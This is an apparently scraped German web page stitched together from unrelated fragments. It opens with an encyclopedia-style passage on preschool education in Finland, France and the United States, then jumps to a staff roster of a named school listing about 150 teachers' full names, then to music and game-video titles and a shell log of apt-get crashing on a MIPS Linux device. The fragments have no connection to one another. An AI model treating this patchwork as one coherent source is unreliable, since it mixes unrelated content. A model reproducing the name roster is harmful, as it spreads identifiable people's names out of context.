Die Ausbildung von Erzieherinnen wurde 1995 in die Universitäten geholt – in Finnland allerdings nicht unumstritten. Zurzeit gibt es für diesen Studiengang eine Aufnahmeprüfung, weil die Nachfrage sehr groß ist. Erzieherinnen sind in Finnland wie Lehrer kommunale Angestellte. In der Regel ist dieses Personal gewerkschaftlich organisiert. Aber auch in Finnland verdienen Erzieherinnen (wie in Deutschland) weniger als die Kollegen im Primarschulbereich. Die Sozialerzieherin konzentriert sich stärker auf die Familie und „Sozialhilfe“. Dieser Beruf ist erst in letzter Zeit für die Vorschulerziehung von Bedeutung.
Die Kinderpflegerinnen-Ausbildung wurde 1994 in die Ausbildungsschiene Sozialpflege überführt. Sozialpfleger sollen möglichst breit in unterschiedlichen Bereichen und Gruppen eingesetzt werden können:
Betreuung und Pflege
Entwicklungsförderung
Rehabilitation
Schließlich gibt es noch den Spielgruppenleiter, beispielsweise in Ausbildungsstätten der Lutherischen Kirche.
Frankreich
→ Hauptartikel: École maternelle
Die École Maternelle ist die französische Vorschule. In ihr werden Kinder von drei bis sechs Jahren unterrichtet, dabei sind Kinder einer Altersklasse innerhalb einer Gruppe.
Vereinigte Staaten
→ Hauptartikel: „Vereinigte Staaten“ im Artikel Kindergarten
In den Vereinigten Staaten besteht eine große Bandbreite von öffentlichen und privaten Vorschulprogrammen, die mehr als die Hälfte aller Kinder unter fünf Jahren und fast alle Fünfjährigen erreichen.[9] Das bedeutendste ist der Kindergarten, der in den USA kein Kinderbetreuungs-, sondern ein Bildungsprogramm der Grundschulen ist. Im Kindergarten werden die Fünfjährigen, die ein Jahr später in die erste Klasse gehen sollen, alphabetisiert und ganztägig nach einem altersgemäßen Grundschulcurriculum unterrichtet. Auch die privaten Day Care Centers und Nursery Schools, in denen besserverdienende Berufstätige ihre Kinder ganztags unterbringen, sowie die privaten Preschools, die preiswerter sind, aber nur Teilzeitprogramme anbieten, verstehen sich eher als Bildungseinrichtungen denn als Kinderbetreuungsservice. In solchen Einrichtungen wird nicht nur gespielt, gesungen und gebastelt, sondern auch grundschulpropädeutisch gelernt. Ein kleiner Teil der Vierjährigen erlernt hier bereits das Lesen, Schreiben und Rechnen. Auch Fremdsprachenunterricht findet gelegentlich statt. Migrantenkinder, die solche Ganztagsprogramme besuchen, erlernen Englisch per Immersion und sprechen es später meist auf muttersprachlichem Niveau. Viele amerikanische Vorschulprogramme – vor allem die ambitionierten Day Care Centers und Nursery Schools – lassen sich heute ähnlich akkreditieren, wie dies früher nur bei Hochschulen üblich war. Um soziale Ungerechtigkeiten auszugleichen – der Besuch guter Vorschulprogramme ist kostspielig und steht nur der Mittelschicht zur Verfügung – wurde 1965 das staatliche Programm Head Start begründet, in dem Kinder aus bildungsfernen Sozialschichten u. a. kostenlose Vorschulbildung erhalten können.
Siehe auch
Familienzentrum
Kinderkrippe
Schulhort
Literatur
Natalija Kuch: Vorschulerziehung in Finnland – Versuch eines Vergleichs mit der Vorschulerziehung in Deutschland. Studienarbeit. GRIN Verlag, 2007, ISBN 978-3-640-48458-4.
Norbert Kühne: Vorschulische Erziehung – Wandel und pädagogische Profession der frühen Bildung, Raabe Verlag, Stuttgart 2017
Weblinks
JMK/KMK-Beschluss von 2004 (PDF; 48 kB)
Übersicht über die Bildungspläne der Länder
senbjs.berlin.de
Fachartikel zur Kindergartenpädagogik
Einzelnachweise
Gerhard Witzlack, Werner Klemke (Ill.): Bald bin ich ein Schulkind. Ein Buch zur Vorbereitung der Kinder auf die Schule. Verlag Volk und Wissen Berlin 1973, OCLC 179220810.
Vorschulklassen in Hamburger Grundschulen. In: hamburg.de. Abgerufen am 16. März 2016.
Vorschulklassen, Beispiel August-Hermann-Francke-Schulen, Hamburg
Abfrage bei HamburgService - Schulinfosystem (Memento des Originals vom 20. Oktober 2013 im Internet Archive) i Info: Der Archivlink wurde automatisch eingesetzt und noch nicht geprüft. Bitte prüfe Original- und Archivlink gemäß Anleitung und entferne dann diesen Hinweis.
Richtlinie für die Bildung und Erziehung in Vorschulklassen, Hamburg
Regelungen an Hamburger Vorschulen: Elternwahlrecht (Memento des Originals vom 24. Oktober 2013 im Internet Archive) i Info: Der Archivlink wurde automatisch eingesetzt und noch nicht geprüft. Bitte prüfe Original- und Archivlink gemäß Anleitung und entferne dann diesen Hinweis.
Vorkurs Deutsch 240, Bayern (Memento des Originals vom 20. Februar 2015 im Internet Archive) i Info: Der Archivlink wurde automatisch eingesetzt und noch nicht geprüft. Bitte prüfe Original- und Archivlink gemäß Anleitung und entferne dann diesen Hinweis.
Staatsinstitut für Frühpädagogik: Kindergärten mit integrierter Sprachförderung - Vorkurse Deutsch (Memento des Originals vom 24. April 2012 im Internet Archive) i Info: Der Archivlink wurde automatisch eingesetzt und noch nicht geprüft. Bitte prüfe Original- und Archivlink gemäß Anleitung und entferne dann diesen Hinweis.
Why Should Schools Be Involved in Early Childhood? (Memento des Originals vom 21. März 2009 im Internet Archive) i Info: Der Archivlink wurde automatisch eingesetzt und noch nicht geprüft. Bitte prüfe Original- und Archivlink gemäß Anleitung und entferne dann diesen Hinweis.
Normdaten (Sachbegriff): GND: 4188709-8
Kategorien:
SchultypVorschulpädagogikLebensstadium
Theo Koch Schule Gruenberg Kollegium 2018 und 2019
flash2 aka DJSpaceCourt - The Universe [Remake-2019] Aka Christian Fladung
Kollegium 2018/19
Aigner, Tanja
Almon, Marc
Altintas, Ceylan
Andersen, Oliver
Bäumner, Anne
Becker, Ann-Kristin
Biesgen, Matthias
Bink, Matthias
Bittendorf, Inga
Bosold, Felix
Bott, Sabrina
Bogusch, Dagmar
Braun, Peter
Breitstadt, Sarah
Burkart-Schäfer, Tanja
Chiroiu, Ingrid
Cimiotti, Verena
Daniel, Ulrich
Dörrbeck, Christine
Eifler, Elina
Eller, Rita
Engelke, Merit
Enns, Viktor
Evert, Meike
Feth, Clarissa
Gans, Corinna
Gehle, Nico
Geitl, Rainer
Gernoth, Rainer
Gimbel, Stefanie
Goldstein, Nicole
Goldstein, Rolf
Gonder, Renate
Göppert, Svenja
Größer, Peter
Halbich, Kerstin
Harthun, Christine
Hasenkampf, Albina
Hebert, Julia
Heide, Norbert
Heinke, Heike
Heun, Kathinka
Heuser, Aleksandra
Hofmann-Anders, Petra
Horst, Hans
Huscher, Martin
Hussain, Daniel
Irlmeyer, Bernd
Ißleib, Thorsten
Jacob-Schwalb, Corinna
Jochim, Marcel
Jochim, Synthia
Johnson, Nicole
Jorde, Andreas
Junker, Sebastian
Kammer, Sven
Kämmerling, Steffen
Kastner, Paula
Keller, Jörg
Klaus, Friedemann
Kleber, Laiska
Klein, Miriam
König, Manina
Kramer, Rüdiger
Kratz-Gunkel, Heike
Krimke, Christina
Krumbiegel, Thomas
Kühle, Nicole
Kupfer, Florian
Langwasser, Elisabeth
Leuschner, Christine
Lisiecki, Annika
Maikler, Claudia
Mandler, Jutta
Mandler, Katja
Matis, Lina
Meiss, Peter
Metelmann, Moritz
Meyerinck, Rebecca von
Miebs, Alexandra
Miller, Georg
Mißbach, Markus
Molzberger, Peter
Müller, Alice
Müller, Christina
Neis, Max
Noack, Christian
Orth, Matthias
Paul, Roman
Pausch, Harald
Peter, Alexandra-Bettina
Philippi, Katharina
Plensat, Britta
Pregizer, Pia
Prick, Annalena
Raabe, Lisa
Reichel, Heike
Reidel, Nina
Reus, Manfred
Rink, Lena
Rischmann, Katja
Roth, Theresia
Rüster, Philipp
Schaake, Andreas
Schaake, Birte
Schildwächter, Kristin
Schmidt, Corinna
Schmidt, Ronald
Schmitt, Daniela
Schmitt, Michael
Schön, Benjamin
Schreyeck, Lothar
Schulze, Lothar
Schweizer, Rebecca
Sener, Dilan
Seror, Dominik
Sieber, Gerhard
Simon, Svenja
Sirokov, Lilija
Steuger, Klaus
Steuger, Monja-Lenke
Stöhr, Franz-Josef
Stöhr, Rebekka
Stumpf, Verena
Thelen, Oliver
Thelen, Tina
Trenk, Karina
Trikos, Veronika
Verworrn, Angela
Voglis, Andreas
Wagenknecht, Tobias
Wagner, Julia
Wallner, Donald
Warnecke, Anja
Weber, Kim
Wildner, Ralph
Wilhelmi, Hermann
Winkler, Christoph
Yamaner, Tatjana
Zeuch, Christian
Zimmermann, Carina
Zurek, Katharina
SIDStation 1 Format
flash2 aka DJSpaceCourt - Geburtstagslied von Christian - The Wave III Radio Edit
Klangbeispiel flash2 aka DJSpaceCourt - Katram 3.2 mit SIDStation, C64 und Emuliertem Chiptune.
Nachts im Mondschein lag auf einem Blatt ein kleines Ei
<!DOCTYPE html>
-->
Edward Snowden und die Rueckkehr
The Cranberries - Zombie [Lost Sky Remix]
Indianer Jones Longplay
Monkey Island 2 - Longplay HD
Sam und Max - Hit The Road Point und Click Adventure
Sam & Max - Hit The Road
Lets Play Vollgas - Full Throttle German - Die Introduction - Der Hinterhalt
Lets Play Vollgas - Full Throttle German - Die Introduction - Der Hinterhalt
edge:/mnt/cfa4# uname -a
Linux edge 4.14.180 #1 Tue Jun 9 09:32:04 CEST 2020 mips GNU/Linux
edge:/mnt/cfa4#
edge:/mnt/cfa4#
edge:/mnt/cfa4#
edge:/mnt/cfa4#
edge:/mnt/cfa4#
edge:/mnt/cfa4#
edge:/mnt/cfa4#
edge:/mnt/cfa4#
edge:/mnt/cfa4# wlan0: No active IBSS STAs - trying to scan for other IBSS networks with same SSID (merge)
apt-get install freeradius
apt-get: /usr/local/lib/liblzma.so.5: no version information available (required by /usr/lib/mipsel-linux-gnu/libapt-p)
wlan0: No active IBSS STAs - trying to scan for other IBSS networks with same SSID (merge)
wlan0: No active IBSS STAs - trying to scan for other IBSS networks with same SSID (merge)
wlan0: No active IBSS STAs - trying to scan for other IBSS networks with same SSID (merge)
wlan0: No active IBSS STAs - trying to scan for other IBSS networks with same SSID (merge)
do_page_fault(): sending SIGSEGV to apt-get for invalid read access from 00000000
epc = 77a1cec4 in libc-2.19.so[77994000+16b000]
ra = 77e85090 in libapt-pkg.so.4.12.0[77d43000+185000]
Segmentation fault
edge:/mnt/cfa4# wlan0: No active IBSS STAs - trying to scan for other IBSS networks with same SSID (merge)
edge:/mnt/cfa4# apt-get ins^C
edge:/mnt/cfa4# nano /etc/apwlan0: No active IBSS STAs - trying to scan for other IBSS networks with same SSID (merge)
Kommentare
Derzeit gibt es noch keine Kommentare zu dieser Stimme